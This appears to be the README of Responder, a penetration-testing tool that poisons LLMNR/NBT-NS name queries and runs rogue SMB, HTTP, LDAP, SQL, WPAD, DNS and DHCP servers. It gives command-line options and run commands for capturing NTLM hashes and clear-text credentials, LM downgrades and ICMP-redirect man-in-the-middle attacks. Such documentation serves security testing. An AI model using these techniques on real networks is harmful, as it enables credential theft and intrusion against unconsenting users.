Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. SMBv2 has also been implemented and is supported by default. Built-in MSSQL Auth server.
In order to redirect SQL Authentication to this tool, you will need to set the option -r (NBT-NS queries for SQL Server lookup are using the Workstation Service name suffix) for systems older than windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005 & 2008. Built-in HTTP Auth server.
In order to redirect HTTP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari.
Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). You can now send your custom files to a victim. Built-in HTTPS Auth server.
Same as above. The folder certs/ contains 2 default keys, including a dummy private key. This is intentional, the purpose is to have Responder working out of the box. A script was added in case you need to generate your own self signed key pair. Built-in LDAP Auth server.
In order to redirect LDAP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin. Built-in FTP, POP3, IMAP, SMTP Auth servers.
This modules will collect clear text credentials. Built-in DNS server.
This server will answer type A queries. This is really handy when it's combined with ARP spoofing. Built-in WPAD Proxy Server. This module will capture all HTTP requests from anyone launching Internet Explorer on the network if they have "Auto-detect settings" enabled. This module is highly effective. You can configure your custom PAC script in Responder.conf and inject HTML into the server's responses. See Responder.conf. Browser Listener
This module allows to find the PDC in stealth mode. Fingerprinting
When the option -f is used, Responder will fingerprint every host who issued an LLMNR/NBT-NS query. All capture modules still work while in fingerprint mode.
Icmp Redirect
python tools/Icmp-Redirect.py
For MITM on Windows XP/2003 and earlier Domain members. This attack combined with the DNS module is pretty effective.
Rogue DHCP
python tools/DHCP.py
DHCP Inform Spoofing. Allows you to let the real DHCP Server issue IP addresses, and then send a DHCP Inform answer to set your IP address as a primary DNS server, and your own WPAD URL. Analyze mode.
This module allows you to see NBT-NS, BROWSER, LLMNR, DNS requests on the network without poisoning any responses. Also, you can map domains, MSSQL servers, workstations passively, see if ICMP Redirects attacks are plausible on your subnet. Hashes
All hashes are printed to stdout and dumped in an unique file John Jumbo compliant, using this format:(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt
Log files are located in the "logs/" folder. Hashes will be logged and printed only once per user per hash type, unless you are using the Verbose mode (-v). Responder will logs all its activity to Responder-Session.log Analyze mode will be logged to Analyze-Session.log Poisoning will be logged to Poisoners-Session.log
Additionally, all captured hashed are logged into an SQLite database which you can configure in Responder.conf Considerations
This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128 and Multicast UDP 5553.
If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports.
For Ubuntu users:
Edit this file /etc/NetworkManager/NetworkManager.conf and comment the line: dns=dnsmasq. Then kill dnsmasq with this command (as root): killall dnsmasq -9
Any rogue server can be turned off in Responder.conf.
This tool is not meant to work on Windows.
For OSX, please note: Responder must be launched with an IP address for the -i flag (e.g. -i YOUR_IP_ADDR). There is no native support in OSX for custom interface binding. Using -i en1 will not work. Also to run Responder with the best experience, run the following as root:
First of all, please take a look at Responder.conf and tweak it for your needs.
Running the tool:./Responder.py [options]
Typical Usage Example:./Responder.py -I eth0 -rPv
Options: --version show program's version number and exit. -h, --help show this help message and exit. -A, --analyze Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding. -I eth0, --interface=eth0 Network interface to use. -i 10.0.0.21, --ip=10.0.0.21 Local IP to use (only for OSX) -e 10.0.0.22, --externalip=10.0.0.22 Poison all requests with another IP address than Responder's one. -b, --basic Return a Basic HTTP authentication. Default: NTLM -r, --wredir Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: Off -d, --NBTNSdomain Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: Off -f, --fingerprint This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query. -w, --wpad Start the WPAD rogue proxy server. Default value is Off -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port) -F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt. Default: Off -P, --ProxyAuth Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: Off --lm Force LM hashing downgrade for Windows XP/2003 and earlier. Default: Off -v, --verbose Increase verbosity.
